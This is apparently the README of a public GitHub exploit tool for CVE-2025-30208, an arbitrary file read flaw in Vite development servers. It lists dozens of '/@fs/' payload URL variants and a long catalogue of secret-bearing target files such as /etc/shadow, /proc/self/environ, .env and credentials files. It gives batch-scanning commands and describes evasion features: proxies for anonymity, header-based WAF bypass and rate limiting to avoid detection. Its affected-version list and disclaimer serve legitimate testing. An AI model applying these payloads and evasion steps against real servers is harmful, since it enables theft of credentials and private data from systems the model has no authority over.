🔥 CVE-2025-30208 Vite Arbitrary File Read Vulnerability Scanner

Advanced vulnerability scanner for CVE-2025-30208 with enterprise-grade features

Professional penetration testing tool for Vite Arbitrary File Read vulnerability detection

🚀 Quick Start • 📋 Features • 🔧 Usage • 📊 Examples • 🛡️ Security

📖 Overview

This is a comprehensive vulnerability scanner designed to detect and exploit the CVE-2025-30208 vulnerability in Vite development servers. The vulnerability allows arbitrary file read access through Vite's file system endpoints, potentially exposing sensitive configuration files, source code, and system information.

🎯 What This Tool Does

Detects vulnerable Vite instances across networks
Exploits the arbitrary file read vulnerability safely
Discovers sensitive files and configuration data
Reports findings in multiple formats (HTML, JSON, Console)
Manages scanning sessions and configurations
Handles errors gracefully with automatic retry mechanisms

🏗️ Modular Architecture

The tool now features a modular architecture for better maintainability and extensibility:

CVE-2025-30208.py - Main scanner application
payloads.py - Advanced exploitation payloads (60+ variations)
sensitive_files.py - Comprehensive sensitive file database (200+ files)
html_template.py - Enhanced hacker-style HTML reporting template

🚀 Quick Start

Prerequisites

pip3 install -r requirements.txt

Basic Usage

python3 CVE-2025-30208.py

CVE-2025-30208 > set RHOST 192.168.1.100
CVE-2025-30208 > set RPORT 3000
CVE-2025-30208 > run

📋 Features

🔍 Core Vulnerability Detection

60+ Advanced Payloads: Comprehensive exploitation techniques for maximum detection
Smart Detection: Intelligent response analysis to avoid false positives
Real-time Validation: Continuous validation of target responses
Comprehensive Testing: Tests all known vulnerable endpoints

🛡️ Enhanced Security Features

Proxy Support: HTTP/HTTPS proxy configuration for anonymity
Custom Headers: Bypass WAF/IPS with custom HTTP headers
Rate Limiting: Configurable delays to avoid detection
Session Management: Save and restore scanning sessions
Input Validation: Comprehensive parameter validation

🔧 Advanced Capabilities

Batch Scanning: Multi-threaded scanning of multiple targets
Sensitive File Discovery: Automated discovery of 200+ sensitive files
Connectivity Testing: TCP/UDP/HTTP/HTTPS protocol testing
Error Recovery: Automatic retry with exponential backoff
Comprehensive Logging: Detailed logs with timestamps

📊 Reporting & Output

🎨 Enhanced HTML Reports: Beautiful hacker-style vulnerability reports with animations
JSON Export: Structured data for further analysis
Console Output: Color-coded real-time feedback
Log Files: Detailed audit trails
Interactive Web Interface: Built-in web server for viewing reports

🔧 Usage Guide

1. Basic Configuration

CVE-2025-30208 > set RHOST 192.168.1.100
CVE-2025-30208 > set RPORT 3000
CVE-2025-30208 > set FILEPATH etc/passwd

CVE-2025-30208 > test

2. Vulnerability Testing

CVE-2025-30208 > run

# Enable verbose mode for detailed output
CVE-2025-30208 > verbose
CVE-2025-30208 > run

3. Batch Scanning

CVE-2025-30208 > set THREADS 10
CVE-2025-30208 > batch

192.168.1.100:3000
192.168.1.101:3000
192.168.1.102:3000
[Press Enter twice to finish]

4. Sensitive File Discovery

CVE-2025-30208 > scan

5. Advanced Configuration

# Configure proxy
CVE-2025-30208 > proxy
Enter proxy: http://127.0.0.1:8080

# Set custom headers
CVE-2025-30208 > headers
Enter headers: {"User-Agent": "Custom Scanner"}

# Configure rate limiting
CVE-2025-30208 > rate
Enter rate limit: 1.0

6. Enhanced HTML Reporting

# Generate beautiful HTML report
CVE-2025-30208 > pull

# Start web server to view report
CVE-2025-30208 > web

# Start web server on specific port
CVE-2025-30208 > web 8081

# Stop web server
CVE-2025-30208 > web off

📊 Command Reference

Command	Description	Example
`set <option> <value>`	Set configuration options	`set RHOST 192.168.1.100`
`show options`	Display current settings	`show options`
`edit`	Interactive option editor	`edit`
`run` / `exploit`	Run vulnerability test	`run`
`batch`	Batch scan multiple targets	`batch`
`scan`	Discover sensitive files	`scan`
`pull`	Export results to HTML/JSON	`pull`
`web [on\|off\|port]`	Web server for HTML reports	`web 8080`
`save`	Save session configuration	`save`
`load`	Load session configuration	`load`
`test`	Test connectivity to target	`test`
`validate`	Validate current configuration	`validate`
`verbose`	Toggle verbose mode	`verbose`
`proxy`	Configure proxy settings	`proxy`
`headers`	Set custom HTTP headers	`headers`
`rate`	Configure rate limiting	`rate`
`log`	Show logging information	`log`
`help` / `?`	Show help	`help`
`exit` / `quit`	Exit tool	`exit`

⚙️ Configuration Options

Option	Description	Default	Validation
`RHOST`	Target host/IP address	-	Hostname/IP validation
`RPORT`	Target port number	-	Port range (1-65535)
`FILEPATH`	File path to test	`etc/passwd`	Path validation
`PROXY`	HTTP/HTTPS proxy URL	-	URL format validation
`VERBOSE`	Enable verbose output	`false`	Boolean validation
`RATE_LIMIT`	Delay between requests (seconds)	`0.3`	Numeric validation
`THREADS`	Number of threads for batch scanning	`5`	Integer validation
`TIMEOUT`	Request timeout (seconds)	`5`	Integer validation
`CUSTOM_HEADERS`	Custom HTTP headers (JSON)	`{}`	JSON format validation

🎨 Enhanced Payload System

The scanner now uses 60+ different payload variations organized in payloads.py:

Primary @fs Payloads

/@fs/{file_path}?raw??
/@fs/{file_path}?raw&url
/@fs/{file_path}?import&raw??
/@fs/{file_path}?raw&import
/@fs/{file_path}?import&url

Extended Parameter Variations

/@fs/{file_path}?raw&source
/@fs/{file_path}?raw&content
/@fs/{file_path}?raw&data
/@fs/{file_path}?raw&file
/@fs/{file_path}?raw&type=text
/@fs/{file_path}?raw&format=text
/@fs/{file_path}?raw&encoding=utf8

Vite-Specific Variations

/@fs/{file_path}?raw&vite&dev
/@fs/{file_path}?raw&vite&hot
/@fs/{file_path}?raw&vite&hmr
/@fs/{file_path}?raw&development
/@fs/{file_path}?raw&debug

Module System Variations

/@fs/{file_path}?raw&esm
/@fs/{file_path}?raw&cjs
/@fs/{file_path}?raw&umd
/@fs/{file_path}?raw&js
/@fs/{file_path}?raw&ts
/@fs/{file_path}?raw&json
/@fs/{file_path}?raw&css
/@fs/{file_path}?raw&html

Alternative Endpoints

/app/{file_path}?raw??
/App/{file_path}?raw??

🔍 Enhanced Sensitive File Discovery

The tool now tests for 200+ sensitive files organized in sensitive_files.py:

🖥️ System Files (Linux/Unix)

/etc/passwd - User account information
/etc/shadow - Encrypted password data
/etc/services - Network services
/etc/hosts - Hostname mappings
/etc/fstab - File system table
/etc/ssh/sshd_config - SSH server configuration
/etc/crontab - System cron jobs
/etc/sudoers - Sudo configuration

📊 Process Information

/proc/version - Kernel version
/proc/cpuinfo - CPU information
/proc/meminfo - Memory information
/proc/self/environ - Process environment
/proc/self/cmdline - Process command line
/proc/net/tcp - TCP connections
/proc/net/udp - UDP connections

⚙️ Application Configuration

.env - Environment variables
.env.local - Local environment
.env.production - Production environment
config.json - Application configuration
settings.json - Application settings
application.properties - Spring configuration
application.yml - YAML configuration
database.yml - Database configuration
secrets.json - Secret management

📦 Node.js / JavaScript Files

package.json - Node.js dependencies
package-lock.json - Locked dependencies
yarn.lock - Yarn lock file
vite.config.js - Vite configuration
vite.config.ts - TypeScript Vite config
tsconfig.json - TypeScript configuration
webpack.config.js - Webpack configuration
next.config.js - Next.js configuration
nuxt.config.js - Nuxt.js configuration
angular.json - Angular configuration
vue.config.js - Vue.js configuration
rollup.config.js - Rollup configuration
eslint.config.js - ESLint configuration
prettier.config.js - Prettier configuration
jest.config.js - Jest configuration
babel.config.js - Babel configuration
tailwind.config.js - Tailwind CSS configuration

🔧 Git Files

.git/config - Git configuration
.gitignore - Git ignore rules
.gitattributes - Git attributes
.gitmodules - Git submodules
.git/HEAD - Current branch
.git/logs/HEAD - Git logs
.git/refs/heads/master - Master branch
.git/refs/heads/main - Main branch

📚 Documentation Files

README.md - Project documentation
CHANGELOG.md - Change log
LICENSE - License information
CONTRIBUTING.md - Contribution guidelines
AUTHORS - Author information
TODO.md - Todo list
ROADMAP.md - Development roadmap

🐳 Docker Files

Dockerfile - Docker configuration
docker-compose.yml - Docker Compose
docker-compose.override.yml - Override configuration
.dockerignore - Docker ignore rules
docker-compose.prod.yml - Production configuration
docker-compose.dev.yml - Development configuration

🌐 Web Server Configuration

nginx.conf - Nginx configuration
apache2.conf - Apache configuration
httpd.conf - HTTP daemon config
.htaccess - Apache access control
web.config - IIS configuration
robots.txt - Search engine directives
sitemap.xml - Site structure
manifest.json - Web app manifest
sw.js - Service worker
firebase.json - Firebase configuration
firebase.rules - Firebase security rules

🪟 Windows Files

boot.ini - Boot configuration
autoexec.bat - Auto-execution script
system.ini - System configuration
win.ini - Windows configuration
Users - User directories
Windows - System files
Program Files - Application directories

🍎 macOS Files

System - System files
Library - Library files
Applications - Application files
private/etc/hosts - Hosts file
private/etc/passwd - User accounts

🗄️ Database Files

database.db - SQLite database
database.sqlite - SQLite database
data.db - Data database
dump.sql - Database dump
schema.sql - Database schema
migrations - Database migrations

📝 Log Files

logs - Log directory
error.log - Error logs
access.log - Access logs
app.log - Application logs
debug.log - Debug logs
combined.log - Combined logs

💾 Backup Files

backup - Backup directory
backup.sql - Database backup
backup.zip - Compressed backup
dump - Data dump
export - Data export

🔒 Security & Authentication

auth.json - Authentication configuration
credentials.json - Credential storage
keys.json - Key management
tokens.json - Token storage
jwt.json - JWT configuration
oauth.json - OAuth configuration

🔌 API & Service Files

api.json - API configuration
swagger.json - API documentation
openapi.json - OpenAPI specification
graphql.json - GraphQL configuration
schema.json - API schema

☁️ Cloud & Deployment

cloudformation.yml - AWS CloudFormation
serverless.yml - Serverless configuration
terraform.tf - Terraform configuration
kubernetes.yml - Kubernetes configuration
k8s.yml - Kubernetes configuration

📊 Monitoring & Analytics

analytics.json - Analytics configuration
monitoring.json - Monitoring setup
metrics.json - Metrics configuration
telemetry.json - Telemetry data

🎨 Enhanced HTML Reporting

The tool now generates beautiful hacker-style HTML reports with:

✨ Visual Features

Matrix-style background with animated falling characters
Gradient animations and glowing effects
Interactive elements with hover effects
Responsive design for all devices
Dark theme optimized for security professionals

📊 Interactive Statistics

Real-time counters for total leaks and bytes exposed
Severity indicators with color coding
Copy functionality for each leak
Content preview with size and line count
Expandable sections for detailed analysis

🔧 Technical Features

Google Fonts integration (JetBrains Mono, Orbitron)
CSS animations and transitions
JavaScript interactivity for enhanced UX
Mobile-responsive design
Cross-browser compatibility

🌐 Web Server Integration

Built-in HTTP server for viewing reports
Automatic browser opening
Port configuration options
Easy start/stop commands

🛡️ Error Handling & Recovery

Automatic Retry Mechanism

3 Retry Attempts: Failed requests are automatically retried
Exponential Backoff: Increasing delays between retries
Smart Error Classification: Different handling for different error types
Graceful Recovery: Tool continues operation after errors

Error Categories

NetworkError: Connection, timeout, proxy issues
ConfigurationError: Invalid settings and parameters
ValidationError: Invalid input parameters
ScannerError: General scanner errors

Validation Features

Real-time Input Validation: All parameters validated before use
Configuration Validation: Complete validation before scanning
Connectivity Testing: TCP/UDP/HTTP/HTTPS protocol testing
Proxy Validation: Proxy URL format validation

📁 Output Files

File	Description	Format
`data_leak.html`	Enhanced hacker-style HTML vulnerability report	HTML
`data_leak.json`	Structured JSON export	JSON
`sensitive_files_discovery.json`	Discovered sensitive files	JSON
`session.json`	Saved session configuration	JSON
`logs/cve_2025_30208_YYYYMMDD_HHMMSS.log`	Detailed audit logs	Text

📝 Affected Versions

🚨 Vulnerable Versions

6.2.0 ≤ Vite ≤ 6.2.2
6.1.0 ≤ Vite ≤ 6.1.1
6.0.0 ≤ Vite ≤ 6.0.11
5.0.0 ≤ Vite ≤ 5.4.14
Vite ≤ 4.5.9

✅ Unaffected Versions

Vite ≥ 6.2.3
6.1.2 ≤ Vite < 6.2.0
6.0.12 ≤ Vite < 6.1.0
5.4.15 ≤ Vite < 6.0.0
4.5.10 ≤ Vite < 5.0.0

🛡️ Security & Ethical Usage

⚠️ Important Security Notes

Authorized Testing Only: Use only on systems you own or have explicit permission to test
Responsible Disclosure: Report vulnerabilities to system owners
Rate Limiting: Use appropriate delays to avoid overwhelming targets
Proxy Usage: Consider using proxies for anonymity when appropriate
Legal Compliance: Ensure compliance with local laws and regulations

🔒 Best Practices

Always obtain written permission before testing
Use in controlled environments only
Document all testing activities
Respect rate limits and system resources
Report findings responsibly

🚀 Advanced Usage Examples

Example 1: Comprehensive Network Scan

CVE-2025-30208 > set THREADS 20
CVE-2025-30208 > set RATE_LIMIT 0.5
CVE-2025-30208 > set TIMEOUT 10
CVE-2025-30208 > verbose
CVE-2025-30208 > batch

Example 2: Stealth Scanning with Proxy

CVE-2025-30208 > proxy
Enter proxy: http://127.0.0.1:8080
CVE-2025-30208 > headers
Enter headers: {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"}
CVE-2025-30208 > set RATE_LIMIT 2.0
CVE-2025-30208 > run

Example 3: Enhanced Reporting Workflow

CVE-2025-30208 > set RHOST 192.168.1.100
CVE-2025-30208 > set RPORT 3000
CVE-2025-30208 > run
CVE-2025-30208 > pull
CVE-2025-30208 > web 8080

Example 4: Sensitive File Discovery

CVE-2025-30208 > set RHOST 192.168.1.100
CVE-2025-30208 > set RPORT 3000
CVE-2025-30208 > scan

🏗️ Project Structure

CVE-2025-30208/
├── CVE-2025-30208.py          # Main scanner application
├── payloads.py                # Advanced exploitation payloads (60+)
├── sensitive_files.py         # Sensitive file database (200+)
├── html_template.py           # Enhanced HTML reporting template
├── README.md                  # This documentation
├── requirements.txt           # Python dependencies
├── logs/                      # Log files directory
├── data_leak.html            # Generated HTML reports
├── data_leak.json            # Generated JSON reports
└── session.json              # Saved session configurations

🤝 Contributing

We welcome contributions to improve this tool:

Fork the repository
Create a feature branch
Make your changes
Test thoroughly
Submit a pull request

Contribution Areas

New payload variations in payloads.py
Additional sensitive file patterns in sensitive_files.py
Enhanced HTML templates in html_template.py
Improved error handling
Performance optimizations
Documentation improvements

📄 License

This project is licensed for educational and authorized security testing purposes only.

⚠️ Legal Disclaimer: This tool is intended for authorized security testing and research purposes only. Users are responsible for ensuring they have proper authorization before testing any systems. The authors are not responsible for any misuse of this tool.

👨‍💻 Author

ThemeHackers

Security Researcher & Penetration Tester

⭐ If this tool helped you, please give it a star! ⭐

Built with ❤️ for the security community

Name		Name	Last commit message	Last commit date
Latest commit History 48 Commits
.github/codeql		.github/codeql
CVE-2025-30208.py		CVE-2025-30208.py
LICENSE		LICENSE
README.md		README.md
SECURITY.md		SECURITY.md
html_template.py		html_template.py
payloads.py		payloads.py
requirements.txt		requirements.txt
sensitive_files.py		sensitive_files.py
session.json		session.json
start.sh		start.sh

License

ThemeHackers/CVE-2025-30208

Folders and files

Latest commit

History

Repository files navigation